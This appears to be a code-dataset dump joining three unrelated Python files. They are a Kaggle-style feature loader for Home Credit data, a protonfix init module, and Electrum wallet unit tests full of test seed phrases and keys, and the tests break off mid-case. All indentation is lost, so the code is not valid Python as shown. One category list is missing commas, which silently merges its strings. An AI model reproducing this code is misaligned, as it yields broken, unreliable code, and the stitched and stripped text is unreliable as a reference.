# -*- coding: utf-8 -*-
"""
Created on Sun Jul 22 21:41:21 2018
@author: Kazuki
"""
import pandas as pd
# =============================================================================
# LB804
# =============================================================================
def load_train_LB804():
return pd.read_feather('../data/X_train_LB0.804.f')
def load_test_LB804():
return pd.read_feather('../data/X_test_LB0.804.f')
def load_cat_LB804():
return ['f108_NAME_GOODS_CATEGORY', 'f002_WEEKDAY_APPR_PROCESS_START',
'f109_NAME_GOODS_CATEGORY', 'f108_NAME_TYPE_SUITE', 'f109_PRODUCT_COMBINATION',
'f002_NAME_FAMILY_STATUS', 'f002_OCCUPATION_TYPE', 'f108_PRODUCT_COMBINATION',
'f510_CREDIT_TYPE', 'f002_WALLSMATERIAL_MODE', 'f002_NAME_INCOME_TYPE',
'f002_NAME_EDUCATION_TYPE', 'f002_ORGANIZATION_TYPE', 'f509_CREDIT_TYPE']
# =============================================================================
# LB806
# =============================================================================
def load_train_LB806():
return pd.read_pickle('../feature_someone/0727/20180727_train_rk.pkl')
def load_test_LB806():
return pd.read_pickle('../feature_someone/0727/20180727_test_rk.pkl')
def load_cat_LB806():
return ['FLAG_DOCUMENT_PATTERN' 'FLAG_OWN_CAR' 'FLAG_OWN_REALTY'
'FONDKAPREMONT_MODE' 'HOUSETYPE_MODE' 'NAME_CONTRACT_TYPE'
'NAME_EDUCATION_TYPE' 'NAME_FAMILY_STATUS' 'NAME_HOUSING_TYPE'
'NAME_INCOME_TYPE' 'NAME_TYPE_SUITE' 'OCCUPATION_TYPE'
'WALLSMATERIAL_MODE' 'WEEKDAY_APPR_PROCESS_START']
# =============================================================================
# LB806
# =============================================================================
def load_train_CV805_LB803():
return pd.read_pickle('../data/X_train_CV805_LB803.pkl.gz')
def load_test_CV805_LB803():
return pd.read_pickle('../data/X_test_CV805_LB803.pkl.gz')
def load_cat_CV805_LB803():
return ['f108_PRODUCT_COMBINATION', 'f002_WALLSMATERIAL_MODE', 'f002_NAME_EDUCATION_TYPE',
'f109_NAME_GOODS_CATEGORY', 'f002_ORGANIZATION_TYPE', 'f108_NAME_GOODS_CATEGORY',
'f002_NAME_INCOME_TYPE', 'f002_NAME_FAMILY_STATUS', 'f002_WEEKDAY_APPR_PROCESS_START',
'f002_OCCUPATION_TYPE', 'f109_PRODUCT_COMBINATION', 'f108_NAME_TYPE_SUITE']
class Loader:
def __init__(self, name):
"""
LB804
LB806
CV805_LB803
"""
if name not in ['LB804', 'LB806', 'CV805_LB803']:
raise Exception(name)
self.name = name
def train(self):
if self.name == 'LB804':
return load_train_LB804()
elif self.name == 'LB806':
return load_train_LB806()
elif self.name == 'CV805_LB803':
return load_train_CV805_LB803()
else:
raise Exception(self.name)
def test(self):
if self.name == 'LB804':
return load_test_LB804()
elif self.name == 'LB806':
return load_test_LB806()
elif self.name == 'CV805_LB803':
return load_test_CV805_LB803()
else:
raise Exception(self.name)
def category(self):
if self.name == 'LB804':
return load_cat_LB804()
elif self.name == 'LB806':
return load_cat_LB806()
elif self.name == 'CV805_LB803':
return load_cat_CV805_LB803()
else:
raise Exception(self.name)
|
py | 1a38c81d2a380e5904dc9997bc6452aee99926f4 | """ Starts the protonfix module
"""
import os
import sys
from . import fix
if 'DEBUG' in os.environ:
from . import debug
if 'STEAM_COMPAT_DATA_PATH' in os.environ:
fix.main()
|
py | 1a38c9223040ce251056ae8989005e509cbad781 | import unittest
from unittest import mock
import shutil
import tempfile
from typing import Sequence
from electrum import storage, bitcoin, keystore, constants
from electrum import Transaction
from electrum import SimpleConfig
from electrum.address_synchronizer import TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_UNCONF_PARENT
from electrum.wallet import sweep, Multisig_Wallet, Standard_Wallet, Imported_Wallet
from electrum.util import bfh, bh2u
from electrum.transaction import TxOutput
from electrum.plugins.trustedcoin import trustedcoin
from . import TestCaseForTestnet
from . import SequentialTestCase
from .test_bitcoin import needs_test_with_all_ecc_implementations
_UNICODE_HORROR_HEX = 'e282bf20f09f988020f09f98882020202020e3818620e38191e3819fe381be20e3828fe3828b2077cda2cda2cd9d68cda16fcda2cda120ccb8cda26bccb5cd9f6eccb4cd98c7ab77ccb8cc9b73cd9820cc80cc8177cd98cda2e1b8a9ccb561d289cca1cda27420cca7cc9568cc816fccb572cd8fccb5726f7273cca120ccb6cda1cda06cc4afccb665cd9fcd9f20ccb6cd9d696ecda220cd8f74cc9568ccb7cca1cd9f6520cd9fcd9f64cc9b61cd9c72cc95cda16bcca2cca820cda168ccb465cd8f61ccb7cca2cca17274cc81cd8f20ccb4ccb7cda0c3b2ccb5ccb666ccb82075cca7cd986ec3adcc9bcd9c63cda2cd8f6fccb7cd8f64ccb8cda265cca1cd9d3fcd9e'
UNICODE_HORROR = bfh(_UNICODE_HORROR_HEX).decode('utf-8')
# 'โฟ ๐ ๐ ใ ใใใพ ใใ wอขอขอhอกoอขอก ฬธอขkฬตอnฬดอวซwฬธฬsอ ฬฬwออขแธฉฬตaาฬกอขt ฬงฬhฬoฬตrอฬตrorsฬก ฬถอกอ lฤฏฬถeออ ฬถอinอข อtฬhฬทฬกอe ออdฬaอrฬอกkฬขฬจ อกhฬดeอaฬทฬขฬกrtฬอ ฬดฬทอ รฒฬตฬถfฬธ uฬงอnรญฬอcอขอoฬทอdฬธอขeฬกอ?อ'
class WalletIntegrityHelper:
gap_limit = 1 # make tests run faster
@classmethod
def check_seeded_keystore_sanity(cls, test_obj, ks):
test_obj.assertTrue(ks.is_deterministic())
test_obj.assertFalse(ks.is_watching_only())
test_obj.assertFalse(ks.can_import())
test_obj.assertTrue(ks.has_seed())
@classmethod
def check_xpub_keystore_sanity(cls, test_obj, ks):
test_obj.assertTrue(ks.is_deterministic())
test_obj.assertTrue(ks.is_watching_only())
test_obj.assertFalse(ks.can_import())
test_obj.assertFalse(ks.has_seed())
@classmethod
def create_standard_wallet(cls, ks, gap_limit=None):
store = storage.WalletStorage('if_this_exists_mocking_failed_648151893')
store.put('keystore', ks.dump())
store.put('gap_limit', gap_limit or cls.gap_limit)
w = Standard_Wallet(store)
w.synchronize()
return w
@classmethod
def create_imported_wallet(cls, privkeys=False):
store = storage.WalletStorage('if_this_exists_mocking_failed_648151893')
if privkeys:
k = keystore.Imported_KeyStore({})
store.put('keystore', k.dump())
w = Imported_Wallet(store)
return w
@classmethod
def create_multisig_wallet(cls, keystores: Sequence, multisig_type: str, gap_limit=None):
"""Creates a multisig wallet."""
store = storage.WalletStorage('if_this_exists_mocking_failed_648151893')
for i, ks in enumerate(keystores):
cosigner_index = i + 1
store.put('x%d/' % cosigner_index, ks.dump())
store.put('wallet_type', multisig_type)
store.put('gap_limit', gap_limit or cls.gap_limit)
w = Multisig_Wallet(store)
w.synchronize()
return w
class TestWalletKeystoreAddressIntegrityForMainnet(SequentialTestCase):
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_standard(self, mock_write):
seed_words = 'cycle rocket west magnet parrot shuffle foot correct salt library feed song'
self.assertEqual(bitcoin.seed_type(seed_words), 'standard')
ks = keystore.from_seed(seed_words, '', False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'xprv9s21ZrQH143K32jECVM729vWgGq4mUDJCk1ozqAStTphzQtCTuoFmFafNoG1g55iCnBTXUzz3zWnDb5CVLGiFvmaZjuazHDL8a81cPQ8KL6')
self.assertEqual(ks.xpub, 'xpub661MyMwAqRbcFWohJWt7PHsFEJfZAvw9ZxwQoDa4SoMgsDDM1T7WK3u9E4edkC4ugRnZ8E4xDZRpk8Rnts3Nbt97dPwT52CwBdDWroaZf8U')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '1NNkttn1YvVGdqBW4PR6zvc3Zx3H5owKRf')
self.assertEqual(w.get_change_addresses()[0], '1KSezYMhAJMWqFbVFB2JshYg69UpmEXR4D')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_segwit(self, mock_write):
seed_words = 'bitter grass shiver impose acquire brush forget axis eager alone wine silver'
self.assertEqual(bitcoin.seed_type(seed_words), 'segwit')
ks = keystore.from_seed(seed_words, '', False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'zprvAZswDvNeJeha8qZ8g7efN3FXYVJLaEUsE9TW6qXDEbVe74AZ75c2sZFZXPNFzxnhChDQ89oC8C5AjWwHmH1HeRKE1c4kKBQAmjUDdKDUZw2')
self.assertEqual(ks.xpub, 'zpub6nsHdRuY92FsMKdbn9BfjBCG6X8pyhCibNP6uDvpnw2cyrVhecvHRMa3Ne8kdJZxjxgwnpbHLkcR4bfnhHy6auHPJyDTQ3kianeuVLdkCYQ')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1q3g5tmkmlvxryhh843v4dz026avatc0zzr6h3af')
self.assertEqual(w.get_change_addresses()[0], 'bc1qdy94n2q5qcp0kg7v9yzwe6wvfkhnvyzje7nx2p')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_segwit_passphrase(self, mock_write):
seed_words = 'bitter grass shiver impose acquire brush forget axis eager alone wine silver'
self.assertEqual(bitcoin.seed_type(seed_words), 'segwit')
ks = keystore.from_seed(seed_words, UNICODE_HORROR, False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'zprvAZDmEQiCLUcZXPfrBXoksCD2R6RMAzAre7SUyBotibisy9c7vGhLYvHaP3d9rYU12DKAWdZfscPNA7qEPgTkCDqX5sE93ryAJAQvkDbfLxU')
self.assertEqual(ks.xpub, 'zpub6nD7dvF6ArArjskKHZLmEL9ky8FqaSti1LN5maDWGwFrqwwGTp1b6ic4EHwciFNaYDmCXcQYxXSiF9BjcLCMPcaYkVN2nQD6QjYQ8vpSR3Z')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1qx94dutas7ysn2my645cyttujrms5d9p57f6aam')
self.assertEqual(w.get_change_addresses()[0], 'bc1qcywwsy87sdp8vz5rfjh3sxdv6rt95kujdqq38g')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_old(self, mock_write):
seed_words = 'powerful random nobody notice nothing important anyway look away hidden message over'
self.assertEqual(bitcoin.seed_type(seed_words), 'old')
ks = keystore.from_seed(seed_words, '', False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.Old_KeyStore))
self.assertEqual(ks.mpk, 'e9d4b7866dd1e91c862aebf62a49548c7dbf7bcc6e4b7b8c9da820c7737968df9c09d5a3e271dc814a29981f81b3faaf2737b551ef5dcc6189cf0f8252c442b3')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '1FJEEB8ihPMbzs2SkLmr37dHyRFzakqUmo')
self.assertEqual(w.get_change_addresses()[0], '1KRW8pH6HFHZh889VDq6fEKvmrsmApwNfe')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_2fa(self, mock_write):
seed_words = 'kiss live scene rude gate step hip quarter bunker oxygen motor glove'
self.assertEqual(bitcoin.seed_type(seed_words), '2fa')
xprv1, xpub1, xprv2, xpub2 = trustedcoin.TrustedCoinPlugin.xkeys_from_seed(seed_words, '')
ks1 = keystore.from_xprv(xprv1)
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'xprv9uraXy9F3HP7i8QDqwNTBiD8Jf4bPD4Epif8cS8qbUbgeidUesyZpKmzfcSeHutsGfFnjgih7kzwTB5UQVRNB5LoXaNc8pFusKYx3KVVvYR')
self.assertEqual(ks1.xpub, 'xpub68qvwUg8sewQvcUgwxuTYr9rrgu5nfn6BwajQpYT9p8fXWxdCRHpN86UWruWJAD1ede8Sv8ERrTa22Gyc4SBfm7zFpcyoVWVBKCVwnw6s1J')
self.assertEqual(ks1.xpub, xpub1)
ks2 = keystore.from_xprv(xprv2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
self.assertEqual(ks2.xprv, 'xprv9uraXy9F3HP7kKSiRAvLV7Nrjj7YzspDys7dvGLLu4tLZT49CEBxPWp88dHhVxvZ69SHrPQMUCWjj4Ka2z9kNvs1HAeEf3extGGeSWqEVqf')
self.assertEqual(ks2.xpub, 'xpub68qvwUg8sewQxoXBXCTLrFKbHkx3QLY5M63EiejxTQRKSFPHjmWCwK8byvZMM2wZNYA3SmxXoma3M1zxhGESHZwtB7SwrxRgKXAG8dCD2eS')
self.assertEqual(ks2.xpub, xpub2)
long_user_id, short_id = trustedcoin.get_user_id(
{'x1/': {'xpub': xpub1},
'x2/': {'xpub': xpub2}})
xpub3 = trustedcoin.make_xpub(trustedcoin.get_signing_xpub(), long_user_id)
ks3 = keystore.from_xpub(xpub3)
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks3)
self.assertTrue(isinstance(ks3, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2, ks3], '2of3')
self.assertEqual(w.txin_type, 'p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '35L8XmCDoEBKeaWRjvmZvoZvhp8BXMMMPV')
self.assertEqual(w.get_change_addresses()[0], '3PeZEcumRqHSPNN43hd4yskGEBdzXgY8Cy')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip44_standard(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, '', "m/44'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'xprv9zGLcNEb3cHUKizLVBz6RYeE9bEZAVPjH2pD1DEzCnPcsemWc3d3xTao8sfhfUmDLMq6e3RcEMEvJG1Et8dvfL8DV4h7mwm9J6AJsW9WXQD')
self.assertEqual(ks.xpub, 'xpub6DFh1smUsyqmYD4obDX6ngaxhd53Zx7aeFjoobebm7vbkT6f9awJWFuGzBT9FQJEWFBL7UyhMXtYzRcwDuVbcxtv9Ce2W9eMm4KXLdvdbjv')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '16j7Dqk3Z9DdTdBtHcCVLaNQy9MTgywUUo')
self.assertEqual(w.get_change_addresses()[0], '1GG5bVeWgAp5XW7JLCphse14QaC4qiHyWn')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip44_standard_passphrase(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, UNICODE_HORROR, "m/44'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'xprv9z8izheguGnLopSqkY7GcGFrP2Gu6rzBvvHo6uB9B8DWJhsows6WDZAsbBTaP3ncP2AVbTQphyEQkahrB9s1L7ihZtfz5WGQPMbXwsUtSik')
self.assertEqual(ks.xpub, 'xpub6D85QDBajeLe2JXJrZeGyQCaw47PWKi3J9DPuHakjTkVBWCxVQQkmMVMSSfnw39tj9FntbozpRtb1AJ8ubjeVSBhyK4M5mzdvsXZzKPwodT')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '1F88g2naBMhDB7pYFttPWGQgryba3hPevM')
self.assertEqual(w.get_change_addresses()[0], '1H4QD1rg2zQJ4UjuAVJr5eW1fEM8WMqyxh')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip49_p2sh_segwit(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, '', "m/49'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'yprvAJEYHeNEPcyBoQYM7sGCxDiNCTX65u4ANgZuSGTrKN5YCC9MP84SBayrgaMyZV7zvkHrr3HVPTK853s2SPk4EttPazBZBmz6QfDkXeE8Zr7')
self.assertEqual(ks.xpub, 'ypub6XDth9u8DzXV1tcpDtoDKMf6kVMaVMn1juVWEesTshcX4zUVvfNgjPJLXrD9N7AdTLnbHFL64KmBn3SNaTe69iZYbYCqLCCNPZKbLz9niQ4')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh-p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '35ohQTdNykjkF1Mn9nAVEFjupyAtsPAK1W')
self.assertEqual(w.get_change_addresses()[0], '3KaBTcviBLEJajTEMstsA2GWjYoPzPK7Y7')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip84_native_segwit(self, mock_write):
# test case from bip84
seed_words = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, '', "m/84'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'zprvAdG4iTXWBoARxkkzNpNh8r6Qag3irQB8PzEMkAFeTRXxHpbF9z4QgEvBRmfvqWvGp42t42nvgGpNgYSJA9iefm1yYNZKEm7z6qUWCroSQnE')
self.assertEqual(ks.xpub, 'zpub6rFR7y4Q2AijBEqTUquhVz398htDFrtymD9xYYfG1m4wAcvPhXNfE3EfH1r1ADqtfSdVCToUG868RvUUkgDKf31mGDtKsAYz2oz2AGutZYs')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1qcr8te4kr609gcawutmrza0j4xv80jy8z306fyu')
self.assertEqual(w.get_change_addresses()[0], 'bc1q8c6fshw2dlwun7ekn9qwf37cu2rn755upcp6el')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_multisig_seed_standard(self, mock_write):
seed_words = 'blast uniform dragon fiscal ensure vast young utility dinosaur abandon rookie sure'
self.assertEqual(bitcoin.seed_type(seed_words), 'standard')
ks1 = keystore.from_seed(seed_words, '', True)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks1)
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'xprv9s21ZrQH143K3t9vo23J3hajRbzvkRLJ6Y1zFrUFAfU3t8oooMPfb7f87cn5KntgqZs5nipZkCiBFo5ZtaSD2eDo7j7CMuFV8Zu6GYLTpY6')
self.assertEqual(ks1.xpub, 'xpub661MyMwAqRbcGNEPu3aJQqXTydqR9t49Tkwb4Esrj112kw8xLthv8uybxvaki4Ygt9xiwZUQGeFTG7T2TUzR3eA4Zp3aq5RXsABHFBUrq4c')
# electrum seed: ghost into match ivory badge robot record tackle radar elbow traffic loud
ks2 = keystore.from_xpub('xpub661MyMwAqRbcGfCPEkkyo5WmcrhTq8mi3xuBS7VEZ3LYvsgY1cCFDbenT33bdD12axvrmXhuX3xkAbKci3yZY9ZEk8vhLic7KNhLjqdh5ec')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '32ji3QkAgXNz6oFoRfakyD3ys1XXiERQYN')
self.assertEqual(w.get_change_addresses()[0], '36XWwEHrrVCLnhjK5MrVVGmUHghr9oWTN1')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_multisig_seed_segwit(self, mock_write):
seed_words = 'snow nest raise royal more walk demise rotate smooth spirit canyon gun'
self.assertEqual(bitcoin.seed_type(seed_words), 'segwit')
ks1 = keystore.from_seed(seed_words, '', True)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks1)
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'ZprvAjxLRqPiDfPDxXrm8JvcoCGRAW6xUtktucG6AMtdzaEbTEJN8qcECvujfhtDU3jLJ9g3Dr3Gz5m1ypfMs8iSUh62gWyHZ73bYLRWyeHf6y4')
self.assertEqual(ks1.xpub, 'Zpub6xwgqLvc42wXB1wEELTdALD9iXwStMUkGqBgxkJFYumaL2dWgNvUkjEDWyDFZD3fZuDWDzd1KQJ4NwVHS7hs6H6QkpNYSShfNiUZsgMdtNg')
# electrum seed: hedgehog sunset update estate number jungle amount piano friend donate upper wool
ks2 = keystore.from_xpub('Zpub6y4oYeETXAbzLNg45wcFDGwEG3vpgsyMJybiAfi2pJtNF3i3fJVxK2BeZJaw7VeKZm192QHvXP3uHDNpNmNDbQft9FiMzkKUhNXQafUMYUY')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2wsh')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1qvzezdcv6vs5h45ugkavp896e0nde5c5lg5h0fwe2xyfhnpkxq6gq7pnwlc')
self.assertEqual(w.get_change_addresses()[0], 'bc1qxqf840dqswcmu7a8v82fj6ej0msx08flvuy6kngr7axstjcaq6us9hrehd')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_multisig_seed_bip45_standard(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks1 = keystore.from_bip39_seed(seed_words, '', "m/45'/0")
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'xprv9vyEFyXf7pYVv4eDU3hhuCEAHPHNGuxX73nwtYdpbLcqwJCPwFKknAK8pHWuHHBirCzAPDZ7UJHrYdhLfn1NkGp9rk3rVz2aEqrT93qKRD9')
self.assertEqual(ks1.xpub, 'xpub69xafV4YxC6o8Yiga5EiGLAtqR7rgNgNUGiYgw3S9g9pp6XYUne1KxdcfYtxwmA3eBrzMFuYcNQKfqsXCygCo4GxQFHfywxpUbKNfYvGJka')
# bip39 seed: tray machine cook badge night page project uncover ritual toward person enact
# der: m/45'/0
ks2 = keystore.from_xpub('xpub6B26nSWddbWv7J3qQn9FbwPPQktSBdPQfLfHhRK4375QoZq8fvM8rQey1koGSTxC5xVoMzNMaBETMUmCqmXzjc8HyAbN7LqrvE4ovGRwNGg')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '3JPTQ2nitVxXBJ1yhMeDwH6q417UifE3bN')
self.assertEqual(w.get_change_addresses()[0], '3FGyDuxgUDn2pSZe5xAJH1yUwSdhzDMyEE')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_multisig_seed_p2sh_segwit(self, mock_write):
# bip39 seed: pulse mixture jazz invite dune enrich minor weapon mosquito flight fly vapor
# der: m/49'/0'/0'
# NOTE: there is currently no bip43 standard derivation path for p2wsh-p2sh
ks1 = keystore.from_xprv('YprvAUXFReVvDjrPerocC3FxVH748sJUTvYjkAhtKop5VnnzVzMEHr1CHrYQKZwfJn1As3X4LYMav6upxd5nDiLb6SCjRZrBH76EFvyQAG4cn79')
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xpub, 'Ypub6hWbqA2p47QgsLt5J4nxrR3ngu8xsPGb7PdV8CDh48KyNngNqPKSqertAqYhQ4umELu1UsZUCYfj9XPA6AdSMZWDZQobwF7EJ8uNrECaZg1')
# bip39 seed: slab mixture skin evoke harsh tattoo rare crew sphere extend balcony frost
# der: m/49'/0'/0'
ks2 = keystore.from_xpub('Ypub6iNDhL4WWq5kFZcdFqHHwX4YTH4rYGp8xbndpRrY7WNZFFRfogSrL7wRTajmVHgR46AT1cqUG1mrcRd7h1WXwBsgX2QvT3zFbBCDiSDLkau')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2wsh-p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '35LeC45QgCVeRor1tJD6LiDgPbybBXisns')
self.assertEqual(w.get_change_addresses()[0], '39RhtDchc6igmx5tyoimhojFL1ZbQBrXa6')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip32_extended_version_bytes(self, mock_write):
seed_words = 'crouch dumb relax small truck age shine pink invite spatial object tenant'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
bip32_seed = keystore.bip39_to_seed(seed_words, '')
self.assertEqual('0df68c16e522eea9c1d8e090cfb2139c3b3a2abed78cbcb3e20be2c29185d3b8df4e8ce4e52a1206a688aeb88bfee249585b41a7444673d1f16c0d45755fa8b9',
bh2u(bip32_seed))
def create_keystore_from_bip32seed(xtype):
ks = keystore.BIP32_KeyStore({})
ks.add_xprv_from_seed(bip32_seed, xtype=xtype, derivation='m/')
return ks
ks = create_keystore_from_bip32seed(xtype='standard')
self.assertEqual('033a05ec7ae9a9833b0696eb285a762f17379fa208b3dc28df1c501cf84fe415d0', ks.derive_pubkey(0, 0))
self.assertEqual('02bf27f41683d84183e4e930e66d64fc8af5508b4b5bf3c473c505e4dbddaeed80', ks.derive_pubkey(1, 0))
ks = create_keystore_from_bip32seed(xtype='standard') # p2pkh
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'xprv9s21ZrQH143K3nyWMZVjzGL4KKAE1zahmhTHuV5pdw4eK3o3igC5QywgQG7UTRe6TGBniPDpPFWzXMeMUFbBj8uYsfXGjyMmF54wdNt8QBm')
self.assertEqual(ks.xpub, 'xpub661MyMwAqRbcGH3yTb2kMQGnsLziRTJZ8vNthsVSCGbdBr8CGDWKxnGAFYgyKTzBtwvPPmfVAWJuFmxRXjSbUTg87wDkWQ5GmzpfUcN9t8Z')
self.assertEqual(w.get_receiving_addresses()[0], '19fWEVaXqgJFFn7JYNr6ouxyjZy3uK7CdK')
self.assertEqual(w.get_change_addresses()[0], '1EEX7da31qndYyeKdbM665w1ze5gbkkAZZ')
ks = create_keystore_from_bip32seed(xtype='p2wpkh-p2sh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'yprvABrGsX5C9janu6AdBvHNCMRZVHJfxcaCgoyWgsyi1wSXN9cGyLMe33bpRU54TLJ1ruJbTrpNqusYQeFvBx1CXNb9k1DhKtBFWo8b1sLbXhN')
self.assertEqual(ks.xpub, 'ypub6QqdH2c5z7967aF6HwpNZVNJ3K9AN5J442u7VGPKaGyWEwwRWsftaqvJGkeZKNe7Jb3C9FG3dAfT94ZzFRrcGhMizGvB6Jtm3itJsEFhxMC')
self.assertEqual(w.get_receiving_addresses()[0], '34SAT5gGF5UaBhhSZ8qEuuxYvZ2cm7Zi23')
self.assertEqual(w.get_change_addresses()[0], '38unULZaetSGSKvDx7Krukh8zm8NQnxGiA')
ks = create_keystore_from_bip32seed(xtype='p2wpkh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'zprvAWgYBBk7JR8GkPMk2H4zQSX4fFT7uEZhbvVjUGsbPwpQRFRWDzXCf7FxSg2eTEwwGYRQDLQwJaE6HvsUueRDKcGkcLv7unzjnXCEQVWhrF9')
self.assertEqual(ks.xpub, 'zpub6jftahH18ngZxsSD8JbzmaToDHHcJhHYy9RLGfHCxHMPJ3kemXqTCuaSHxc9KHJ2iE9ztirc5q212MBYy8Gd4w3KrccbgDiFKSwxFpYKEH6')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1qtuynwzd0d6wptvyqmc6ehkm70zcamxpshyzu5e')
self.assertEqual(w.get_change_addresses()[0], 'bc1qjy5zunxh6hjysele86qqywfa437z4xwmleq8wk')
ks = create_keystore_from_bip32seed(xtype='standard') # p2sh
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
